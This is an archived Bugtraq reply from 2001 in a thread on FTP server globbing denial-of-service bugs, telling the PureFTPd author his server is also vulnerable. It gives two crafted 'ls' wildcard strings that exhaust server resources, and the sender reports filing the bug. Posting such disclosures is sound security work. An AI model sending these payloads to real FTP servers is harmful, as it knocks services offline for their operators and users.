Bugtraq mailing list archives
Re: Multiple vendors FTP denial of service
From: Jeff Dafoe <jeffd () EVCOM NET>
Date: Thu, 15 Mar 2001 14:54:17 -0500
- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard expression to *" and the 'ls *' output.
In an ironic twist, PureFTPd (of which you are apparently the author), is
indeed vulnerable to this globbing bug, using variants of the string you
previously posted. Try:
ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/
and
ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/
against your software. To give you the same level of notice you gave
everyone else, I went ahead and posted this into your bug tracking system
about 30 seconds ago.
Jeff
Current thread:
- Multiple vendors FTP denial of service Frank DENIS (Jedi/Sector One) (Mar 15)
- Re: Multiple vendors FTP denial of service Jeff Dafoe (Mar 16)
- Re: Multiple vendors FTP denial of service jedi (Mar 16)
- Re: Multiple vendors FTP denial of service Daniel Roesen (Mar 16)
- Re: Multiple vendors FTP denial of service Elias Levy (Mar 16)
- Re: Multiple vendors FTP denial of service Elias Levy (Mar 19)
- Bash memory exhaustion (was Re: Multiple vendors FTP denial of service) Nick Lamb (Mar 20)
- Re: Multiple vendors FTP denial of service The Flying Hamster (Mar 21)
- Re: Multiple vendors FTP denial of service Elias Levy (Mar 19)
- Re: Multiple vendors FTP denial of service Mike Gleason (Mar 16)
- Re: Multiple vendors FTP denial of service Crist Clark (Mar 19)
- Re: Multiple vendors FTP denial of service JT (Mar 19)
- Re: Multiple vendors FTP denial of service D. J. Bernstein (Mar 19)
(Thread continues...)
- Re: Multiple vendors FTP denial of service Jeff Dafoe (Mar 16)